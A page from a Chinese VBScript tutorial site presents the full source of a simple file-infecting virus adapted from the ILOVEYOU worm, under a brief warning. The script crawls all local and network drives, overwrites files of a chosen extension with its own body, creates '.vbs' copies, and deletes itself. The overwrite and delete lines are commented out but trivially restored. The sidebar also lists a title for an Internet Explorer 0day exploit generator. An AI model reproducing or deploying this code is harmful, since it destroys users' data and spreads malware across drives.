当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > vbs病毒的简单例子源代码解析

VBScript
网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Vbs COM之打开/保存文件脚本代码
当某IP 连接我机器的3389端口 报警的脚本
利用WMI实现系统补丁检测分析
vbs 调用中文语音让你电脑听你的命令的实现代码
SQLids.vbs 0.7(最终版,以后改成gui界面的)
vbs 函数 获取数组字符串的最后一个LastOne 挺方便的
枚举域内计算机个数vbscript脚本(没环境,没测试)
VBS 脚本不能运行 提示Windows无法访问指定设备路径或文件
vbs 搜索代理地址实现代码[小偷程序]
vbscript 调用WebService实现代码
VBScript 算一算你从出生到现在共计多少天
VBS操作Excel常见方法
VBS 批量读取文件夹内所有的文本到Excel的脚本
vbs 合并多个excel文件的脚本
自动删除超过10天的文件及文件夹的vbs代码
VBScript 常用函数总结
利用WScript.Shell对象隐藏cmd命令行运行框的实现代码
常用VBS代码 值得一看
进程监控实现代码[vbs+bat]

VBScript 中的 vbs病毒的简单例子源代码解析


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 73 ::
收藏到网摘: n/a

说明:作者对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。如果你的系统不支持.vbs,可以将后缀改为.vbe
dim folder,fso,foldername,f,d,dc
set fso=createobject("scripting.filesystemobject")
set self=fso.opentextfile(wscript.scriptfullname,1)
vbscopy=self.readall '读取病毒体,以备复制到文件
self.close
set dc=fso.Drives
for each d in dc
if d.drivetype=3 or d.drivetype=2 then '检查磁盘类型
wscript.echo d '弹出窗口,显示找到盘符
scan(d)
end if
next
lsfile=wscript.scriptfullname '该脚本程序路径
set lsfile=fso.getfile(lsfile)
lsfile.delete(true) '病毒运行后自我删除(本人自加,爱虫病毒本身没有该代码)
sub scan(folder_)
on error resume next
set folder_=fso.getfolder(folder_)
set files=folder_.files
for each file in files
ext=fso.GetExtensionName(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5,当然不存在这种文件,这里可以自己修改,但是注意。请自己建立相应后缀名的文件,最好是非正常后缀名
set ap=fso.opentextfile(file.path,2,true)
' ap.write vbscopy '覆盖文件,慎用
ap.close
set cop=fso.getfile(file.path)
cop.copy(file.path & ".vbs") '创建另外一个病毒文件
' file.delete(true) '删除原来文件
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录
scan(subfolder)
next
end sub